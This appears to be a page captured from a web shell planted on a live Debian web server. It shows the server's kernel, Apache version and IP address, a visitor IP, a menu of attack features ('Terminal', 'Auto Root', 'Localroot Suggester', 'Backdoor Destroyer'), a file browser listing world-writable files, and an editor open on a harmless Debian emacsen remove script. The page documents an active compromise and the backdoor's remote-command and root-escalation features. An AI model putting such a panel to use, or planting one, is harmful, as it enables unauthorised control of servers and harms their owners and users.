Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
emacsen-common /
packages /
remove /
Delete
Unzip
Name
Size
Permission
Date
Action
dictionaries-common
788
B
-rwxrwxrwx
2014-03-06 11:55
emacsen-common
318
B
-rwxrwxrwx
2014-05-21 22:30
Save
Rename
#!/bin/sh # # emacsen remove script for the Debian GNU/Linux # dictionaries-common package # # Written by Rafael Laboissiere <rafael@debian.org> and # Agustin Martin <agmartin@debian.org> based on # Dirk Eddelbuettel <edd@debian.org> script for the octave package. # ----------------------------------------------------------------- set -e # Canadian spelling ;-) flavour=$1 # Do nothing for dummy 'emacs' flavour if [ ${flavour} = emacs ]; then exit 0; fi package=dictionaries-common destination=/usr/share/${flavour}/site-lisp/${package} if [ -d $destination ]; then echo remove/${package}: Purging byte-compiled files for flavour ${flavour} rm -f ${destination}/*.elc ${destination}/*.el ${destination}/done rmdir --ignore-fail-on-non-empty ${destination} fi exit 0;